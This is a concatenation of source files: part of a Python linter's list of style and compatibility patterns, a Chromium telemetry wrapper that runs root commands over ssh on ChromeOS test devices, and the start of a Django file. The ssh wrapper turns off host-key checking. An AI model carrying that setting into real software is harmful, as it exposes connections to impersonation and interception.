# toward the python_utils wrappers that keep the codebase Python 2/3
# compatible.
BAD_PATTERNS_PYTHON_REGEXP = [
    {
        'regexp': re.compile(r'__author__'),
        'message': 'Please remove author tags from this file.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'datetime.datetime.now\(\)'),
        'message': 'Please use datetime.datetime.utcnow() instead of '
                   'datetime.datetime.now().',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\Wprint\('),
        'message': 'Please do not use print statement.',
        'excluded_files': (
            'core/tests/test_utils.py',
            'core/tests/performance_framework/perf_domain.py'),
        'excluded_dirs': ('scripts/',)
    },
    {
        'regexp': re.compile(r'\sprint\('),
        'message': 'Please use python_utils.PRINT().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'# pylint:\s*disable=[A-Z][0-9]{4}'),
        'message': 'Please remove pylint exclusion if it is unnecessary, or '
                   'make it human readable with a sentence instead of an id. '
                   'The id-to-message list can be seen '
                   'here->http://pylint-messages.wikidot.com/all-codes',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'self.assertEquals\('),
        'message': 'Please do not use self.assertEquals method. ' +
                   'This method has been deprecated. Instead use ' +
                   'self.assertEqual method.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'with open\(|= open\('),
        'message': 'Please use python_utils.open_file() instead of open().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'StringIO'),
        'message': 'Please use python_utils.string_io() instead of ' +
                   'import StringIO.',
        'excluded_files': ('python_utils.py', 'python_utils_test.py'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urllib\..*quote\('),
        'message': 'Please use python_utils.url_quote().',
        'excluded_files': ('python_utils.py', 'python_utils_test.py'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urllib\..*unquote_plus\('),
        'message': 'Please use python_utils.url_unquote_plus().',
        'excluded_files': ('python_utils.py', 'python_utils_test.py'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urllib\..*urlencode\('),
        'message': 'Please use python_utils.url_encode().',
        'excluded_files': ('python_utils.py', 'python_utils_test.py'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urllib\..*urlretrieve\('),
        'message': 'Please use python_utils.url_retrieve().',
        'excluded_files': ('python_utils.py', 'python_utils_test.py'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urllib(2)?\..*urlopen\('),
        'message': 'Please use python_utils.url_open().',
        'excluded_files': ('python_utils.py', 'python_utils_test.py'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urlsplit'),
        'message': 'Please use python_utils.url_split().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urlparse'),
        'message': 'Please use python_utils.url_parse().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urlunsplit'),
        'message': 'Please use python_utils.url_unsplit().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'parse_qs'),
        'message': 'Please use python_utils.parse_query_string().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\Wunquote\('),
        'message': 'Please use python_utils.urllib_unquote().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urljoin'),
        'message': 'Please use python_utils.url_join().',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'urllib(2)?\..*Request\('),
        'message': 'Please use python_utils.url_request().',
        'excluded_files': ('python_utils.py', 'python_utils_test.py'),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'[^.|\w]input\('),
        'message': 'Please use python_utils.INPUT.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'[^.|\w|\s]map\('),
        'message': 'Please use python_utils.MAP.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\Wnext\('),
        'message': 'Please use python_utils.NEXT.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'object\):'),
        'message': 'Please use python_utils.OBJECT.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\Wrange\('),
        'message': 'Please use python_utils.RANGE.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\Wround\('),
        'message': 'Please use python_utils.ROUND.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\Wstr\('),
        'message': (
            'Please try to use python_utils.convert_to_bytes() for the strings '
            'used in webapp2\'s built-in methods or for strings used directly '
            'in NDB datastore models. If you need to cast ints/floats to '
            'strings, please use python_utils.UNICODE() instead.'),
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'\Wzip\('),
        'message': 'Please use python_utils.ZIP.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'basestring'),
        'message': 'Please use python_utils.BASESTRING.',
        'excluded_files': ('python_utils.py',),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'__metaclass__'),
        'message': 'Please use python_utils.with_metaclass().',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'iteritems'),
        'message': 'Please use items() instead.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'itervalues'),
        'message': 'Please use values() instead.',
        'excluded_files': (),
        'excluded_dirs': ()
    },
    {
        'regexp': re.compile(r'iterkeys'),
        'message': 'Please use keys() instead.',
        'excluded_files': (),
        'excluded_dirs': ()
    }
]
# Maps a file extension to the list of regex checks run for that file type.
BAD_PATTERNS_MAP = {
    '.js': BAD_PATTERNS_JS_AND_TS_REGEXP,
    '.ts': BAD_PATTERNS_JS_AND_TS_REGEXP,
    '.html': BAD_LINE_PATTERNS_HTML_REGEXP,
    '.py': BAD_PATTERNS_PYTHON_REGEXP
}
def is_filepath_excluded_for_bad_patterns_check(pattern, filepath):
    """Checks whether a file is exempt from a given bad-pattern check.

    Args:
        pattern: str. The pattern (a key of BAD_PATTERNS) to be checked
            against.
        filepath: str. Path of the file.

    Returns:
        bool. Whether to exclude the given file from this
        particular pattern check.
    """
    exclusions = BAD_PATTERNS[pattern]
    in_excluded_dir = any(
        filepath.startswith(excluded_dir)
        for excluded_dir in exclusions['excluded_dirs'])
    return in_excluded_dir or filepath in exclusions['excluded_files']
def check_bad_pattern_in_file(filepath, file_content, pattern):
    """Scans one file for occurrences of a single bad pattern.

    Args:
        filepath: str. Path of the file.
        file_content: str. Contents of the file.
        pattern: dict. Details of the pattern to check:
            regexp: the compiled regex to search each line for.
            message: str. Message to show if the pattern matches.
            excluded_files: tuple(str). Files to be excluded from matching.
            excluded_dirs: tuple(str). Directories to be excluded from
                matching.

    Returns:
        tuple(bool, list(str)). Whether the bad pattern was found, and the
        list of error messages produced.
    """
    error_messages = []
    failed = False
    is_excluded = (
        any(filepath.startswith(excluded_dir)
            for excluded_dir in pattern['excluded_dirs']) or
        any(filepath.endswith(excluded_file)
            for excluded_file in pattern['excluded_files']))
    if is_excluded:
        return failed, error_messages

    regexp = pattern['regexp']
    for line_num, line in enumerate(file_content, 1):
        stripped_line = line[:-1] if line.endswith('\n') else line
        # An explicit trailing marker comment opts a line out of the check.
        if stripped_line.endswith('disable-bad-pattern-check'):
            continue
        if regexp.search(stripped_line):
            error_messages.append('%s --> Line %s: %s' % (
                filepath, line_num, pattern['message']))
            failed = True
    return failed, error_messages
def check_file_type_specific_bad_pattern(filepath, content):
    """Checks the file content against the bad patterns registered for the
    file's extension in BAD_PATTERNS_MAP.

    Args:
        filepath: str. Path of the file.
        content: str. Contents of the file.

    Returns:
        tuple(bool, int, list(str)). Whether any pattern matched, the number
        of patterns that produced at least one match, and the accumulated
        error messages.
    """
    error_messages = []
    total_error_count = 0
    _, extension = os.path.splitext(filepath)
    patterns_for_extension = BAD_PATTERNS_MAP.get(extension) or []
    for regexp in patterns_for_extension:
        pattern_failed, pattern_error_messages = check_bad_pattern_in_file(
            filepath, content, regexp)
        error_messages.extend(pattern_error_messages)
        if pattern_failed:
            total_error_count += 1
    failed = bool(total_error_count)
    return failed, total_error_count, error_messages
class GeneralPurposeLinter(python_utils.OBJECT):
    """Manages all the common linting functions. As an abstract base class,
    this is not intended to be used directly.
    """

    def __init__(self, files_to_lint, file_cache):
        """Constructs a GeneralPurposeLinter object.

        Args:
            files_to_lint: list(str). A list of filepaths to lint.
            file_cache: object(FileCache). Provides thread-safe access to
                cached file content.
        """
        # Set path for node.
        # The path for node is set explicitly, since otherwise the lint
        # tests fail on CircleCI due to the TypeScript files not being
        # compilable.
        os.environ['PATH'] = '%s/bin:' % common.NODE_PATH + os.environ['PATH']
        self.files_to_lint = files_to_lint
        self.file_cache = file_cache

    @property
    def all_filepaths(self):
        """Returns all file paths.

        Returns:
            list(str). The filepaths to lint.
        """
        return self.files_to_lint

    def _check_for_mandatory_pattern_in_file(
            self, pattern_list, filepath, failed):
        """Checks for a given mandatory pattern in a file.

        Args:
            pattern_list: list(dict). The list of the mandatory patterns list
                to be checked for in the file.
            filepath: str. The path to the file to be linted.
            failed: bool. Status of failure of the check.

        Returns:
            tuple(bool, list(str)). The failure status of the check, and the
            error messages produced.
        """
        # Indices of patterns that apply to this file but have not (yet)
        # been found in it.
        pattern_found_list = []
        error_messages = []
        file_content = self.file_cache.readlines(filepath)
        for index, regexp_to_check in enumerate(pattern_list):
            has_included_type = any(
                filepath.endswith(allowed_type)
                for allowed_type in regexp_to_check['included_types'])
            is_excluded = any(
                filepath.endswith(pattern)
                for pattern in (
                    regexp_to_check['excluded_files'] +
                    regexp_to_check['excluded_dirs']))
            if has_included_type and not is_excluded:
                pattern_found_list.append(index)
                for line in file_content:
                    if regexp_to_check['regexp'].search(line):
                        # The pattern is present, so it is not missing.
                        pattern_found_list.pop()
                        break
        if pattern_found_list:
            failed = True
            for pattern_found in pattern_found_list:
                error_message = ('%s --> %s' % (
                    filepath,
                    pattern_list[pattern_found]['message']))
                error_messages.append(error_message)
        return failed, error_messages

    def check_mandatory_patterns(self):
        """This function checks that all files contain the mandatory
        patterns.

        Returns:
            TaskResult. A TaskResult object with the result of the check.
        """
        name = 'Mandatory pattern'
        error_messages = []
        failed = False
        sets_of_patterns_to_match = [
            MANDATORY_PATTERNS_REGEXP, MANDATORY_PATTERNS_JS_REGEXP]
        for filepath in self.all_filepaths:
            for pattern_list in sets_of_patterns_to_match:
                failed, mandatory_error_messages = (
                    self._check_for_mandatory_pattern_in_file(
                        pattern_list, filepath, failed))
                error_messages.extend(mandatory_error_messages)
        return concurrent_task_utils.TaskResult(
            name, failed, error_messages, error_messages)

    def check_bad_patterns(self):
        """This function is used for detecting bad patterns.

        Returns:
            TaskResult. A TaskResult object with the result of the check.
        """
        name = 'Bad pattern'
        total_files_checked = 0
        total_error_count = 0
        error_messages = []
        # The linter's own files deliberately contain the bad patterns, so
        # they are skipped.
        all_filepaths = [
            filepath for filepath in self.all_filepaths if not (
                filepath.endswith('general_purpose_linter.py') or (
                    filepath.endswith('general_purpose_linter_test.py')))]
        failed = False
        for filepath in all_filepaths:
            file_content = self.file_cache.readlines(filepath)
            total_files_checked += 1
            for pattern in BAD_PATTERNS:
                if is_filepath_excluded_for_bad_patterns_check(
                        pattern, filepath):
                    continue
                for line_num, line in enumerate(file_content):
                    if pattern in line:
                        failed = True
                        error_message = ('%s --> Line %s: %s' % (
                            filepath, line_num + 1,
                            BAD_PATTERNS[pattern]['message']))
                        error_messages.append(error_message)
                        total_error_count += 1
            for regexp in BAD_PATTERNS_REGEXP:
                bad_pattern_check_failed, bad_pattern_error_messages = (
                    check_bad_pattern_in_file(
                        filepath, file_content, regexp))
                if bad_pattern_check_failed:
                    # Fold the per-regexp result into the overall flag here.
                    # Previously only the *last* loop iteration's result was
                    # used (the loop variable leaked into an expression after
                    # the loop), so earlier regexp matches could be counted
                    # without marking the overall check as failed.
                    failed = True
                    error_messages.extend(bad_pattern_error_messages)
                    total_error_count += 1
            (
                file_type_specific_bad_pattern_failed,
                temp_count, bad_pattern_error_messages) = (
                    check_file_type_specific_bad_pattern(
                        filepath, file_content))
            failed = failed or file_type_specific_bad_pattern_failed
            total_error_count += temp_count
            error_messages.extend(bad_pattern_error_messages)

            if filepath == 'constants.ts':
                for pattern in REQUIRED_STRINGS_CONSTANTS:
                    if pattern not in file_content:
                        failed = True
                        error_message = ('%s --> %s' % (
                            filepath,
                            REQUIRED_STRINGS_CONSTANTS[pattern]['message']))
                        error_messages.append(error_message)
                        total_error_count += 1
        return concurrent_task_utils.TaskResult(
            name, failed, error_messages, error_messages)

    def check_newline_at_eof(self):
        """This function is used to detect newline at the end of file.

        Returns:
            TaskResult. A TaskResult object with the result of the check.
        """
        name = 'Newline at EOF'
        error_messages = []
        files_to_lint = self.all_filepaths
        failed = False

        for filepath in files_to_lint:
            file_content = self.file_cache.readlines(filepath)
            file_length = len(file_content)
            if (
                    file_length >= 1 and
                    not re.search(r'[^\n]\n', file_content[-1])):
                error_message = (
                    '%s --> There should be a single newline at the '
                    'end of file.' % filepath)
                error_messages.append(error_message)
                failed = True
        return concurrent_task_utils.TaskResult(
            name, failed, error_messages, error_messages)

    def perform_all_lint_checks(self):
        """Perform all the lint checks and returns the messages returned by
        all the checks.

        Returns:
            list(TaskResult). A list of TaskResult objects representing the
            results of the lint checks.
        """
        if not self.all_filepaths:
            return [
                concurrent_task_utils.TaskResult(
                    'General purpose lint', False, [],
                    ['There are no files to be checked.'])]
        task_results = [
            self.check_mandatory_patterns(), self.check_bad_patterns(),
            self.check_newline_at_eof()]
        return task_results
def get_linters(files_to_lint, file_cache):
    """Creates a GeneralPurposeLinter object and returns it.

    Args:
        files_to_lint: list(str). A list of filepaths to lint.
        file_cache: object(FileCache). Provides thread-safe access to cached
            file content.

    Returns:
        tuple(GeneralPurposeLinter, None). A 2-tuple of custom and third_party
        linter objects; there is no third-party linter for these checks.
    """
    return GeneralPurposeLinter(files_to_lint, file_cache), None
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A wrapper around ssh for common operations on a CrOS-based device"""
import logging
import re
import os
import shutil
import stat
import subprocess
import tempfile
# Some developers' workflow includes running the Chrome process from
# /usr/local/... instead of the default location. We have to check for both
# paths in order to support this workflow.
# NOTE(review): the trailing space in each path appears deliberate — these
# are matched as prefixes of a process's full argv string (see
# CrOSInterface.GetChromeProcess), so the space presumably keeps other
# binaries sharing the prefix from matching. Confirm before changing.
_CHROME_PATHS = ['/opt/google/chrome/chrome ',
                 '/usr/local/opt/google/chrome/chrome ']
def RunCmd(args, cwd=None, quiet=False):
  """Executes a program and returns its exit status.

  Args:
    args: A string or a sequence of program arguments. The program to execute
      is the string or the first item in the args sequence.
    cwd: If not None, the subprocess's current directory will be changed to
      |cwd| before it's executed.
    quiet: If True, skips the debug logging of the command line.

  Returns:
    Return code from the command execution.
  """
  if not quiet:
    logging.debug(' '.join(args) + ' ' + (cwd or ''))
  # All of the child's standard streams are tied to /dev/null; only the
  # exit status is of interest here.
  with open(os.devnull, 'w') as devnull:
    child = subprocess.Popen(args=args, cwd=cwd, stdout=devnull,
                             stderr=devnull, stdin=devnull, shell=False)
    return child.wait()
def GetAllCmdOutput(args, cwd=None, quiet=False):
  """Executes a program and captures its standard output and error.

  Args:
    args: A string or a sequence of program arguments. The program to execute
      is the string or the first item in the args sequence.
    cwd: If not None, the subprocess's current directory will be changed to
      |cwd| before it's executed.
    quiet: If True, skips the debug logging of the command and its output.

  Returns:
    A (stdout, stderr) tuple with the command's captured output.
  """
  if not quiet:
    logging.debug(' '.join(args) + ' ' + (cwd or ''))
  with open(os.devnull, 'w') as devnull:
    child = subprocess.Popen(args=args, cwd=cwd, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE, stdin=devnull)
    stdout, stderr = child.communicate()
    if not quiet:
      logging.debug(' > stdout=[%s], stderr=[%s]', stdout, stderr)
    return stdout, stderr
def HasSSH():
  """Returns True iff both ssh and scp can be spawned on this machine."""
  try:
    for tool in ('ssh', 'scp'):
      RunCmd([tool], quiet=True)
  except OSError:
    # Spawning failed, so at least one of the tools is missing.
    logging.debug("HasSSH()->False")
    return False
  logging.debug("HasSSH()->True")
  return True
class LoginException(Exception):
  """Raised when logging in to a CrOS device fails."""
  pass
class KeylessLoginRequiredException(LoginException):
  """Raised when passwordless (key-based) ssh auth is not set up for the
  device."""
  pass
class CrOSInterface(object):
  """A wrapper around ssh/scp for common operations on a CrOS-based device.

  When constructed without a hostname, the interface operates on the local
  machine and commands run through a local shell instead of ssh.
  """
  # pylint: disable=R0923

  def __init__(self, hostname=None, ssh_identity=None):
    """Args:
      hostname: The device to connect to, or None for the local machine.
      ssh_identity: Optional path to an ssh identity (private key) file.
    """
    self._hostname = hostname
    # List of ports generated from GetRemotePort() that may not be in use yet.
    self._reserved_ports = []

    if self.local:
      return

    self._ssh_identity = None
    self._ssh_args = ['-o ConnectTimeout=5',
                      '-o StrictHostKeyChecking=no',
                      '-o KbdInteractiveAuthentication=no',
                      '-o PreferredAuthentications=publickey',
                      '-o UserKnownHostsFile=/dev/null',
                      '-o ControlMaster=no']

    if ssh_identity:
      self._ssh_identity = os.path.abspath(os.path.expanduser(ssh_identity))
      # Tighten the key's permissions; ssh rejects overly-open key files
      # (see the 'UNPROTECTED PRIVATE KEY FILE!' branch in TryLogin).
      os.chmod(self._ssh_identity, stat.S_IREAD)

    # Establish master SSH connection using ControlPersist.
    # Since only one test will be run on a remote host at a time,
    # the control socket filename can be telemetry@hostname.
    self._ssh_control_file = '/tmp/' + 'telemetry' + '@' + hostname
    with open(os.devnull, 'w') as devnull:
      subprocess.call(self.FormSSHCommandLine(['-M', '-o ControlPersist=yes']),
                      stdin=devnull, stdout=devnull, stderr=devnull)

  def __enter__(self):
    return self

  def __exit__(self, *args):
    self.CloseConnection()

  @property
  def local(self):
    """True when operating on the local machine rather than over ssh."""
    return not self._hostname

  @property
  def hostname(self):
    return self._hostname

  def FormSSHCommandLine(self, args, extra_ssh_args=None):
    """Returns the full command list that runs |args| on the device."""
    if self.local:
      # We run the command through the shell locally for consistency with
      # how commands are run through SSH (crbug.com/239161). This work
      # around will be unnecessary once we implement a persistent SSH
      # connection to run remote commands (crbug.com/239607).
      return ['sh', '-c', " ".join(args)]

    full_args = ['ssh',
                 '-o ForwardX11=no',
                 '-o ForwardX11Trusted=no',
                 '-n', '-S', self._ssh_control_file] + self._ssh_args
    if self._ssh_identity is not None:
      full_args.extend(['-i', self._ssh_identity])
    if extra_ssh_args:
      full_args.extend(extra_ssh_args)
    full_args.append('root@%s' % self._hostname)
    full_args.extend(args)
    return full_args

  def _RemoveSSHWarnings(self, toClean):
    """Removes specific ssh warning lines from a string.

    Args:
      toClean: A string that may be containing multiple lines.

    Returns:
      A copy of toClean with all the Warning lines removed.
    """
    # Remove the Warning about connecting to a new host for the first time.
    return re.sub(
        r'Warning: Permanently added [^\n]* to the list of known hosts.\s\n',
        '', toClean)

  def RunCmdOnDevice(self, args, cwd=None, quiet=False):
    """Runs |args| on the device and returns a (stdout, stderr) tuple."""
    stdout, stderr = GetAllCmdOutput(
        self.FormSSHCommandLine(args), cwd, quiet=quiet)
    # The initial login will add the host to the hosts file but will also print
    # a warning to stderr that we need to remove.
    stderr = self._RemoveSSHWarnings(stderr)
    return stdout, stderr

  def TryLogin(self):
    """Verifies passwordless root login to the device.

    Raises:
      LoginException (or KeylessLoginRequiredException) describing the
      connectivity/auth problem when login does not work.
    """
    logging.debug('TryLogin()')
    assert not self.local
    stdout, stderr = self.RunCmdOnDevice(['echo', '$USER'], quiet=True)
    if stderr != '':
      if 'Host key verification failed' in stderr:
        raise LoginException(('%s host key verification failed. ' +
                              'SSH to it manually to fix connectivity.') %
                             self._hostname)
      if 'Operation timed out' in stderr:
        raise LoginException('Timed out while logging into %s' % self._hostname)
      if 'UNPROTECTED PRIVATE KEY FILE!' in stderr:
        raise LoginException('Permissions for %s are too open. To fix this,\n'
                             'chmod 600 %s' % (self._ssh_identity,
                                               self._ssh_identity))
      if 'Permission denied (publickey,keyboard-interactive)' in stderr:
        raise KeylessLoginRequiredException(
            'Need to set up ssh auth for %s' % self._hostname)
      raise LoginException('While logging into %s, got %s' % (
          self._hostname, stderr))
    if stdout != 'root\n':
      raise LoginException(
          'Logged into %s, expected $USER=root, but got %s.' % (
              self._hostname, stdout))

  def FileExistsOnDevice(self, file_name):
    """Returns True iff |file_name| exists on the device."""
    if self.local:
      return os.path.exists(file_name)
    stdout, stderr = self.RunCmdOnDevice([
        'if', 'test', '-e', file_name, ';',
        'then', 'echo', '1', ';',
        'fi'
    ], quiet=True)
    if stderr != '':
      if "Connection timed out" in stderr:
        raise OSError('Machine wasn\'t responding to ssh: %s' %
                      stderr)
      raise OSError('Unexpected error: %s' % stderr)
    exists = stdout == '1\n'
    logging.debug("FileExistsOnDevice(<text>, %s)->%s" % (file_name, exists))
    return exists

  def PushFile(self, filename, remote_filename):
    """Copies the local file |filename| to |remote_filename| on the device."""
    if self.local:
      args = ['cp', '-r', filename, remote_filename]
      stdout, stderr = GetAllCmdOutput(args, quiet=True)
      if stderr != '':
        raise OSError('No such file or directory %s' % stderr)
      return
    args = ['scp', '-r'] + self._ssh_args
    if self._ssh_identity:
      args.extend(['-i', self._ssh_identity])
    args.extend([os.path.abspath(filename),
                 'root@%s:%s' % (self._hostname, remote_filename)])
    stdout, stderr = GetAllCmdOutput(args, quiet=True)
    stderr = self._RemoveSSHWarnings(stderr)
    if stderr != '':
      raise OSError('No such file or directory %s' % stderr)

  def PushContents(self, text, remote_filename):
    """Writes |text| into |remote_filename| on the device."""
    logging.debug("PushContents(<text>, %s)" % remote_filename)
    with tempfile.NamedTemporaryFile() as f:
      f.write(text)
      f.flush()
      self.PushFile(f.name, remote_filename)

  def GetFile(self, filename, destfile=None):
    """Copies |filename| on the device to the local file |destfile|.

    (The previous docstring described the copy in the opposite direction;
    the implementation fetches *from* the device.)

    Args:
      filename: The name of the source file on the device.
      destfile: The name of the local file to copy to; if not specified,
        the basename of the source file is used.
    """
    logging.debug("GetFile(%s, %s)" % (filename, destfile))
    if self.local:
      if destfile is not None and destfile != filename:
        shutil.copyfile(filename, destfile)
      return
    if destfile is None:
      destfile = os.path.basename(filename)
    args = ['scp'] + self._ssh_args
    if self._ssh_identity:
      args.extend(['-i', self._ssh_identity])
    args.extend(['root@%s:%s' % (self._hostname, filename),
                 os.path.abspath(destfile)])
    stdout, stderr = GetAllCmdOutput(args, quiet=True)
    stderr = self._RemoveSSHWarnings(stderr)
    if stderr != '':
      raise OSError('No such file or directory %s' % stderr)

  def GetFileContents(self, filename):
    """Get the contents of a file on the device.

    Args:
      filename: The name of the file on the device.

    Returns:
      A string containing the contents of the file.
    """
    # TODO: handle the self.local case
    assert not self.local
    t = tempfile.NamedTemporaryFile()
    self.GetFile(filename, t.name)
    with open(t.name, 'r') as f2:
      res = f2.read()
      logging.debug("GetFileContents(%s)->%s" % (filename, res))
      f2.close()
      return res

  def ListProcesses(self):
    """Returns (pid, cmd, ppid, state) of all processes on the device."""
    stdout, stderr = self.RunCmdOnDevice([
        '/bin/ps', '--no-headers',
        '-A',
        '-o', 'pid,ppid,args:4096,state'], quiet=True)
    assert stderr == '', stderr
    procs = []
    for l in stdout.split('\n'):  # pylint: disable=E1103
      if l == '':
        continue
      m = re.match(r'^\s*(\d+)\s+(\d+)\s+(.+)\s+(.+)', l, re.DOTALL)
      assert m
      procs.append((int(m.group(1)), m.group(3).rstrip(),
                    int(m.group(2)), m.group(4)))
    logging.debug("ListProcesses(<predicate>)->[%i processes]" % len(procs))
    return procs

  def _GetSessionManagerPid(self, procs):
    """Returns the pid of the session_manager process, given the list of
    processes."""
    for pid, process, _, _ in procs:
      argv = process.split()
      if argv and os.path.basename(argv[0]) == 'session_manager':
        return pid
    return None

  def GetChromeProcess(self):
    """Locates the main chrome browser process.

    Chrome on cros is usually in /opt/google/chrome, but could be in
    /usr/local/ for developer workflows - debug chrome is too large to fit on
    rootfs.

    Chrome spawns multiple processes for renderers. pids wrap around after
    they are exhausted so looking for the smallest pid is not always correct.
    We locate the session_manager's pid, and look for the chrome process
    that's an immediate child. This is the main browser process.
    """
    procs = self.ListProcesses()
    session_manager_pid = self._GetSessionManagerPid(procs)
    if not session_manager_pid:
      return None

    # Find the chrome process that is the child of the session_manager.
    for pid, process, ppid, _ in procs:
      if ppid != session_manager_pid:
        continue
      for path in _CHROME_PATHS:
        if process.startswith(path):
          return {'pid': pid, 'path': path, 'args': process}
    return None

  def GetChromePid(self):
    """Returns pid of main chrome browser process."""
    result = self.GetChromeProcess()
    if result and 'pid' in result:
      return result['pid']
    return None

  def RmRF(self, filename):
    """Recursively deletes |filename| on the device."""
    logging.debug("rm -rf %s" % filename)
    self.RunCmdOnDevice(['rm', '-rf', filename], quiet=True)

  def Chown(self, filename):
    """Recursively chowns |filename| to the chronos user on the device."""
    self.RunCmdOnDevice(['chown', '-R', 'chronos:chronos', filename])

  def KillAllMatching(self, predicate):
    """SIGKILLs every process whose command line satisfies |predicate|.

    Returns:
      The number of processes that were signalled.
    """
    kills = ['kill', '-KILL']
    for pid, cmd, _, _ in self.ListProcesses():
      if predicate(cmd):
        # Fixed: previously written as `'Killing %s, pid %d' % cmd, pid`,
        # which applied % to only |cmd| and raised TypeError at runtime
        # (two placeholders, one substituted value).
        logging.info('Killing %s, pid %d', cmd, pid)
        kills.append(pid)
    logging.debug("KillAllMatching(<predicate>)->%i" % (len(kills) - 2))
    if len(kills) > 2:
      self.RunCmdOnDevice(kills, quiet=True)
    return len(kills) - 2

  def IsServiceRunning(self, service_name):
    """Returns True iff `status |service_name|` reports a running process."""
    stdout, stderr = self.RunCmdOnDevice([
        'status', service_name], quiet=True)
    assert stderr == '', stderr
    running = 'running, process' in stdout
    logging.debug("IsServiceRunning(%s)->%s" % (service_name, running))
    return running

  def GetRemotePort(self):
    """Reserves and returns a port number not currently in use on the device.

    Ports handed out earlier are remembered in _reserved_ports so repeated
    calls do not return the same number before it is actually bound.
    """
    netstat = self.RunCmdOnDevice(['netstat', '-ant'])
    netstat = netstat[0].split('\n')
    ports_in_use = []

    # Skip the two netstat header lines.
    for line in netstat[2:]:
      if not line:
        continue
      address_in_use = line.split()[3]
      port_in_use = address_in_use.split(':')[-1]
      ports_in_use.append(int(port_in_use))

    ports_in_use.extend(self._reserved_ports)

    new_port = sorted(ports_in_use)[-1] + 1
    self._reserved_ports.append(new_port)
    return new_port

  def IsHTTPServerRunningOnPort(self, port):
    """Returns True unless a connection to localhost:|port| is refused."""
    wget_output = self.RunCmdOnDevice(
        ['wget', 'localhost:%i' % (port), '-T1', '-t1'])
    if 'Connection refused' in wget_output[1]:
      return False
    return True

  def FilesystemMountedAt(self, path):
    """Returns the filesystem mounted at |path|"""
    df_out, _ = self.RunCmdOnDevice(['/bin/df', path])
    df_ary = df_out.split('\n')
    # 3 lines for title, mount info, and empty line.
    if len(df_ary) == 3:
      line_ary = df_ary[1].split()
      if line_ary:
        return line_ary[0]
    return None

  def CryptohomePath(self, user):
    """Returns the cryptohome mount point for |user|."""
    stdout, stderr = self.RunCmdOnDevice(
        ['cryptohome-path', 'user', "'%s'" % user])
    if stderr != '':
      raise OSError('cryptohome-path failed: %s' % stderr)
    return stdout.rstrip()

  def IsCryptohomeMounted(self, username, is_guest):
    """Returns True iff |username|'s cryptohome is mounted."""
    profile_path = self.CryptohomePath(username)
    mount = self.FilesystemMountedAt(profile_path)
    mount_prefix = 'guestfs' if is_guest else '/home/.shadow/'
    return mount and mount.startswith(mount_prefix)

  def TakeScreenShot(self, screenshot_prefix):
    """Takes a screenshot, useful for debugging failures."""
    # TODO(achuith): Find a better location for screenshots. Cros autotests
    # upload everything in /var/log so use /var/log/screenshots for now.
    SCREENSHOT_DIR = '/var/log/screenshots/'
    SCREENSHOT_EXT = '.png'

    self.RunCmdOnDevice(['mkdir', '-p', SCREENSHOT_DIR])
    # Use the first unused numbered filename, up to 25 per prefix.
    for i in xrange(25):
      screenshot_file = ('%s%s-%d%s' %
                         (SCREENSHOT_DIR, screenshot_prefix, i,
                          SCREENSHOT_EXT))
      if not self.FileExistsOnDevice(screenshot_file):
        self.RunCmdOnDevice([
            '/usr/local/autotest/bin/screenshot.py',
            screenshot_file])
        return
    logging.warning('screenshot directory full.')

  def RestartUI(self, clear_enterprise_policy):
    """Restarts the ui job (logs the user out).

    Args:
      clear_enterprise_policy: If True, also stops the ui and wipes the
        cached whitelist and Local State before restarting.
    """
    logging.info('(Re)starting the ui (logs the user out)')
    if clear_enterprise_policy:
      self.RunCmdOnDevice(['stop', 'ui'])
      self.RmRF('/var/lib/whitelist/*')
      self.RmRF(r'/home/chronos/Local\ State')
    if self.IsServiceRunning('ui'):
      self.RunCmdOnDevice(['restart', 'ui'])
    else:
      self.RunCmdOnDevice(['start', 'ui'])

  def CloseConnection(self):
    """Tears down the master ssh connection; a no-op for local operation."""
    if not self.local:
      with open(os.devnull, 'w') as devnull:
        subprocess.call(self.FormSSHCommandLine(['-O', 'exit',
                                                 self._hostname]),
                        stdout=devnull, stderr=devnull)
| |
from datetime import datetime, timedelta
from django import forms
from django.conf import settings
from django.shortcuts import get_object_or_404
